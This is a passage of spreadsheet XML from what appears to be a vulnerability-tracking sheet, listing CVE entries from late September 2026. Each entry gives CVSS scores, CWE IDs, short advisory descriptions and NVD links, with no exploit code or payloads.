      <c r="E120" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F120" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G120" s="5" t="inlineStr"/>
      <c r="H120" s="5" t="inlineStr"/>
      <c r="I120" s="5" t="inlineStr"/>
      <c r="J120" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K120" s="5" t="inlineStr"/>
      <c r="L120" s="5" t="inlineStr"/>
      <c r="M120" s="5" t="inlineStr"/>
      <c r="N120" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O120" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P120" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q120" s="5" t="inlineStr"/>
      <c r="R120" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-290</t>
        </is>
      </c>
      <c r="S120" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in Trusted Domain Project OpenDMARC up to 1.4.2. Affected is the function opendmarc_policy_query_dmarc of the component Multi-Record Set Handler. The manipulation results in authentication bypass by spoofing. The attack can be executed remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T120" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101280</t>
        </is>
      </c>
    </row>
    <row r="121">
      <c r="A121" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B121" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C121" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101281</t>
        </is>
      </c>
      <c r="D121" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E121" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F121" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G121" s="5" t="inlineStr"/>
      <c r="H121" s="5" t="inlineStr"/>
      <c r="I121" s="5" t="inlineStr"/>
      <c r="J121" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K121" s="5" t="inlineStr"/>
      <c r="L121" s="5" t="inlineStr"/>
      <c r="M121" s="5" t="inlineStr"/>
      <c r="N121" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O121" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P121" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q121" s="5" t="inlineStr"/>
      <c r="R121" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S121" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in Trusted Domain Project OpenDMARC up to 1.4.2. Affected by this vulnerability is the function opendmarc_sp2_find_mailfrom_domain of the file libopendmarc/opendmarc_spf.c of the component SPF Macro Handler. This manipulation causes improper authentication. The attack is possible to be carried out remotely. The exploit has been published and may be used. Patch name: c48a74c758677fc5272a73eff15ffdbf8afda1a6. Applying a patch is the recommended action to fix this issue.</t>
        </is>
      </c>
      <c r="T121" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101281</t>
        </is>
      </c>
    </row>
    <row r="122">
      <c r="A122" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B122" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C122" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102245</t>
        </is>
      </c>
      <c r="D122" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E122" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F122" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G122" s="5" t="inlineStr"/>
      <c r="H122" s="5" t="inlineStr"/>
      <c r="I122" s="5" t="inlineStr"/>
      <c r="J122" s="5" t="inlineStr"/>
      <c r="K122" s="5" t="inlineStr"/>
      <c r="L122" s="5" t="inlineStr"/>
      <c r="M122" s="5" t="inlineStr"/>
      <c r="N122" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O122" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P122" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q122" s="5" t="inlineStr"/>
      <c r="R122" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-306</t>
        </is>
      </c>
      <c r="S122" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in MODSetter SurfSense up to 2.0.3. The affected element is an unknown function of the file surfsense_backend/app/routes/circleback_webhook_route.py of the component circleback Endpoint. Executing a manipulation can lead to missing authentication. The attack can be launched remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T122" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102245</t>
        </is>
      </c>
    </row>
    <row r="123">
      <c r="A123" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B123" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C123" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102248</t>
        </is>
      </c>
      <c r="D123" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E123" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F123" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G123" s="5" t="inlineStr"/>
      <c r="H123" s="5" t="inlineStr"/>
      <c r="I123" s="5" t="inlineStr"/>
      <c r="J123" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K123" s="5" t="inlineStr"/>
      <c r="L123" s="5" t="inlineStr"/>
      <c r="M123" s="5" t="inlineStr"/>
      <c r="N123" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O123" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P123" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q123" s="5" t="inlineStr"/>
      <c r="R123" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S123" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in Rebuild up to 4.4.7/4.5.0-beta5. This affects an unknown part of the file /user/login of the component Login Endpoint. The manipulation leads to improper authentication. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T123" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102248</t>
        </is>
      </c>
    </row>
    <row r="124">
      <c r="A124" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B124" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C124" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102249</t>
        </is>
      </c>
      <c r="D124" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E124" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F124" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G124" s="5" t="inlineStr"/>
      <c r="H124" s="5" t="inlineStr"/>
      <c r="I124" s="5" t="inlineStr"/>
      <c r="J124" s="5" t="inlineStr"/>
      <c r="K124" s="5" t="inlineStr"/>
      <c r="L124" s="5" t="inlineStr"/>
      <c r="M124" s="5" t="inlineStr"/>
      <c r="N124" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O124" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P124" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q124" s="5" t="inlineStr"/>
      <c r="R124" s="5" t="inlineStr">
        <is>
          <t>CWE-862, CWE-863</t>
        </is>
      </c>
      <c r="S124" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in REBUILD up to 4.4.11. This vulnerability affects unknown code of the file /commons/file-editor-save. The manipulation of the argument url/fileKey results in missing authorization. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T124" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102249</t>
        </is>
      </c>
    </row>
    <row r="125">
      <c r="A125" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B125" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C125" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12267</t>
        </is>
      </c>
      <c r="D125" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E125" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F125" s="5" t="inlineStr">
        <is>
          <t>0fc0942c-577d-436f-ae8e-945763c79b02</t>
        </is>
      </c>
      <c r="G125" s="5" t="inlineStr"/>
      <c r="H125" s="5" t="inlineStr"/>
      <c r="I125" s="5" t="inlineStr"/>
      <c r="J125" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K125" s="5" t="inlineStr"/>
      <c r="L125" s="5" t="inlineStr"/>
      <c r="M125" s="5" t="inlineStr"/>
      <c r="N125" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O125" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P125" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q125" s="5" t="inlineStr"/>
      <c r="R125" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S125" s="5" t="inlineStr">
        <is>
          <t>ManageEngine DDI Central versions below 6201 are vulnerable to Command injection in Windows DNS Query Resolution Policy name field leading to remote code execution.</t>
        </is>
      </c>
      <c r="T125" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12267</t>
        </is>
      </c>
    </row>
    <row r="126">
      <c r="A126" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B126" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C126" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86330</t>
        </is>
      </c>
      <c r="D126" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E126" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F126" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G126" s="5" t="inlineStr"/>
      <c r="H126" s="5" t="inlineStr"/>
      <c r="I126" s="5" t="inlineStr"/>
      <c r="J126" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K126" s="5" t="inlineStr"/>
      <c r="L126" s="5" t="inlineStr"/>
      <c r="M126" s="5" t="inlineStr"/>
      <c r="N126" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O126" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P126" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q126" s="5" t="inlineStr"/>
      <c r="R126" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S126" s="5" t="inlineStr">
        <is>
          <t>An OS command injection flaw was found in the set_hostname_internal function of NooBaa's cluster_internal_api. This component is responsible for managing the Multi-Cloud Object Gateway in OpenShift Data Foundation. The vulnerability occurs because the hostname parameter is passed directly to a shell command without proper sanitization. An authenticated attacker with administrative privileges can provide a specially crafted hostname containing shell metacharacters to execute arbitrary commands on the host system with the privileges of the NooBaa process.</t>
        </is>
      </c>
      <c r="T126" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86330</t>
        </is>
      </c>
    </row>
    <row r="127">
      <c r="A127" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B127" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C127" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96326</t>
        </is>
      </c>
      <c r="D127" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E127" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F127" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G127" s="5" t="inlineStr"/>
      <c r="H127" s="5" t="inlineStr"/>
      <c r="I127" s="5" t="inlineStr"/>
      <c r="J127" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K127" s="5" t="inlineStr"/>
      <c r="L127" s="5" t="inlineStr"/>
      <c r="M127" s="5" t="inlineStr"/>
      <c r="N127" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O127" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P127" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q127" s="5" t="inlineStr"/>
      <c r="R127" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S127" s="5" t="inlineStr">
        <is>
          <t>The HT Contact Form – Drag &amp; Drop Form Builder for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Rich Text Editor Field in all versions up to, and including, 2.10.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t>
        </is>
      </c>
      <c r="T127" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96326</t>
        </is>
      </c>
    </row>
    <row r="128">
      <c r="A128" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B128" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C128" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101091</t>
        </is>
      </c>
      <c r="D128" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E128" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F128" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G128" s="5" t="inlineStr"/>
      <c r="H128" s="5" t="inlineStr"/>
      <c r="I128" s="5" t="inlineStr"/>
      <c r="J128" s="5" t="inlineStr"/>
      <c r="K128" s="5" t="inlineStr"/>
      <c r="L128" s="5" t="inlineStr"/>
      <c r="M128" s="5" t="inlineStr"/>
      <c r="N128" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O128" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P128" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q128" s="5" t="inlineStr"/>
      <c r="R128" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S128" s="5" t="inlineStr">
        <is>
          <t>SiYuan versions before v3.8.4 fail to properly validate SQL statements in block query embed blocks executed against siyuan.db. Attackers can craft malicious .sy documents with non-read-only SQL statements that execute automatically during background indexing, rendering, or export operations without authentication.</t>
        </is>
      </c>
      <c r="T128" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101091</t>
        </is>
      </c>
    </row>
    <row r="129">
      <c r="A129" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B129" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C129" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102335</t>
        </is>
      </c>
      <c r="D129" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E129" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F129" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G129" s="5" t="inlineStr"/>
      <c r="H129" s="5" t="inlineStr"/>
      <c r="I129" s="5" t="inlineStr"/>
      <c r="J129" s="5" t="inlineStr">
        <is>
          <t>nginx, gin</t>
        </is>
      </c>
      <c r="K129" s="5" t="inlineStr"/>
      <c r="L129" s="5" t="inlineStr"/>
      <c r="M129" s="5" t="inlineStr"/>
      <c r="N129" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O129" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P129" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q129" s="5" t="inlineStr"/>
      <c r="R129" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S129" s="5" t="inlineStr">
        <is>
          <t>Nginx Proxy Manager through 2.16.0 fails to restrict the advanced_config field to administrators, allowing non-admin users with manage permissions to inject arbitrary nginx directives. Attackers can inject malicious nginx configuration such as alias directives to serve arbitrary files or control routing for their assigned hosts.</t>
        </is>
      </c>
      <c r="T129" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102335</t>
        </is>
      </c>
    </row>
    <row r="130">
      <c r="A130" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B130" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C130" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15952</t>
        </is>
      </c>
      <c r="D130" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E130" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F130" s="5" t="inlineStr">
        <is>
          <t>cybersecurity@ch.abb.com</t>
        </is>
      </c>
      <c r="G130" s="5" t="inlineStr"/>
      <c r="H130" s="5" t="inlineStr"/>
      <c r="I130" s="5" t="inlineStr"/>
      <c r="J130" s="5" t="inlineStr"/>
      <c r="K130" s="5" t="inlineStr"/>
      <c r="L130" s="5" t="inlineStr"/>
      <c r="M130" s="5" t="inlineStr"/>
      <c r="N130" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O130" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P130" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q130" s="5" t="inlineStr"/>
      <c r="R130" s="5" t="inlineStr">
        <is>
          <t>CWE-732</t>
        </is>
      </c>
      <c r="S130" s="5" t="inlineStr">
        <is>
          <t>Incorrect Permission Assignment for Critical Resource vulnerability in ABB Protection and control IED manager (PCM600).
This issue affects Protection and control IED manager (PCM600): through 2.14.</t>
        </is>
      </c>
      <c r="T130" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15952</t>
        </is>
      </c>
    </row>
    <row r="131">
      <c r="A131" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B131" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C131" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52748</t>
        </is>
      </c>
      <c r="D131" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E131" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F131" s="5" t="inlineStr">
        <is>
          <t>cvd@cert.pl</t>
        </is>
      </c>
      <c r="G131" s="5" t="inlineStr"/>
      <c r="H131" s="5" t="inlineStr"/>
      <c r="I131" s="5" t="inlineStr"/>
      <c r="J131" s="5" t="inlineStr"/>
      <c r="K131" s="5" t="inlineStr"/>
      <c r="L131" s="5" t="inlineStr"/>
      <c r="M131" s="5" t="inlineStr"/>
      <c r="N131" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O131" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P131" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q131" s="5" t="inlineStr"/>
      <c r="R131" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S131" s="5" t="inlineStr">
        <is>
          <t>The Kaon AR2140X router contains a vulnerability where the backup functionality is accessible without authentication. This allows an unauthenticated remote attacker to trigger a configuration backup and retrieve it in a form encrypted by a device-specific key. Triggering this function renders the router inoperable for a substantial period of time. 
This issue was identified in firmware versions up to 4.2.17. Status of newer versions remains unknown.</t>
        </is>
      </c>
      <c r="T131" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52748</t>
        </is>
      </c>
    </row>
    <row r="132">
      <c r="A132" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B132" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C132" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55096</t>
        </is>
      </c>
      <c r="D132" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E132" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F132" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G132" s="5" t="inlineStr"/>
      <c r="H132" s="5" t="inlineStr"/>
      <c r="I132" s="5" t="inlineStr"/>
      <c r="J132" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K132" s="5" t="inlineStr"/>
      <c r="L132" s="5" t="inlineStr"/>
      <c r="M132" s="5" t="inlineStr"/>
      <c r="N132" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O132" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P132" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q132" s="5" t="inlineStr"/>
      <c r="R132" s="5" t="inlineStr">
        <is>
          <t>CWE-184, CWE-918</t>
        </is>
      </c>
      <c r="S132" s="5" t="inlineStr">
        <is>
          <t>fast-mcp-t</t>
        </is>
      </c>
      <c r="T132" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55096</t>
        </is>
      </c>
    </row>
    <row r="133">
      <c r="A133" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B133" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C133" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87114</t>
        </is>
      </c>
      <c r="D133" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E133" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F133" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G133" s="5" t="inlineStr"/>
      <c r="H133" s="5" t="inlineStr"/>
      <c r="I133" s="5" t="inlineStr"/>
      <c r="J133" s="5" t="inlineStr">
        <is>
          <t>docker, rust</t>
        </is>
      </c>
      <c r="K133" s="5" t="inlineStr"/>
      <c r="L133" s="5" t="inlineStr"/>
      <c r="M133" s="5" t="inlineStr"/>
      <c r="N133" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O133" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P133" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q133" s="5" t="inlineStr"/>
      <c r="R133" s="5" t="inlineStr">
        <is>
          <t>CWE-829</t>
        </is>
      </c>
      <c r="S133" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in kube-compare. When processing a 'container://' reference path, the tool incorrectly executes an untrusted container image's entrypoint instead of merely extracting data from a stopped container. This allows a remote attacker to achieve arbitrary code execution on the operator's workstation. If the Docker daemon requires elevated privileges, the untrusted code may execute with root-mediated daemon privileges, posing a significant security risk.</t>
        </is>
      </c>
      <c r="T133" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87114</t>
        </is>
      </c>
    </row>
    <row r="134">
      <c r="A134" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B134" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C134" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90925</t>
        </is>
      </c>
      <c r="D134" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E134" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F134" s="5" t="inlineStr">
        <is>
          <t>iletisim@usom.gov.tr</t>
        </is>
      </c>
      <c r="G134" s="5" t="inlineStr"/>
      <c r="H134" s="5" t="inlineStr"/>
      <c r="I134" s="5" t="inlineStr"/>
      <c r="J134" s="5" t="inlineStr"/>
      <c r="K134" s="5" t="inlineStr"/>
      <c r="L134" s="5" t="inlineStr"/>
      <c r="M134" s="5" t="inlineStr"/>
      <c r="N134" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O134" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P134" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q134" s="5" t="inlineStr"/>
      <c r="R134" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S134" s="5" t="inlineStr">
        <is>
          <t>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Innotim Software, Telecommunications and Consultancy Trade Ltd. Co. Logsign SIEM allows Path Traversal.
This issue affects Logsign SIEM: from 6.4.101 before 6.4.117.</t>
        </is>
      </c>
      <c r="T134" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90925</t>
        </is>
      </c>
    </row>
    <row r="135">
      <c r="A135" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B135" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C135" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93538</t>
        </is>
      </c>
      <c r="D135" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E135" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F135" s="5" t="inlineStr">
        <is>
          <t>meissner@suse.de</t>
        </is>
      </c>
      <c r="G135" s="5" t="inlineStr"/>
      <c r="H135" s="5" t="inlineStr"/>
      <c r="I135" s="5" t="inlineStr"/>
      <c r="J135" s="5" t="inlineStr">
        <is>
          <t>suse</t>
        </is>
      </c>
      <c r="K135" s="5" t="inlineStr"/>
      <c r="L135" s="5" t="inlineStr"/>
      <c r="M135" s="5" t="inlineStr"/>
      <c r="N135" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O135" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P135" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q135" s="5" t="inlineStr"/>
      <c r="R135" s="5" t="inlineStr">
        <is>
          <t>CWE-290, CWE-639</t>
        </is>
      </c>
      <c r="S135" s="5" t="inlineStr">
        <is>
          <t>A cross-tenant authorization issue was discovered in SUSE Rancher Fleet. During agent-initiated cluster registration, cluster labels supplied by the registering agent, including labels in the reserved management.cattle.io/ namespace such as the cluster display name label, were applied to the resulting upstream Cluster object. Because Fleet resolves GitRepo and Bundle targets from those cluster labels, a party able to register a cluster into a Fleet workspace namespace shared with other tenants could cause its own cluster to satisfy targeting rules that administrators intended for a different cluster.
This affects SUSE Rancher Fleet 0.16 before 0.16.1, 0.15 before 0.15.6, 0.14 before 0.14.10, 0.13 before 0.13.15, 0.12 before 0.12.19 and older versions.</t>
        </is>
      </c>
      <c r="T135" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93538</t>
        </is>
      </c>
    </row>
    <row r="136">
      <c r="A136" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B136" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C136" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94286</t>
        </is>
      </c>
      <c r="D136" s="5" t="n">
        <v>7.1</v>
      </c>
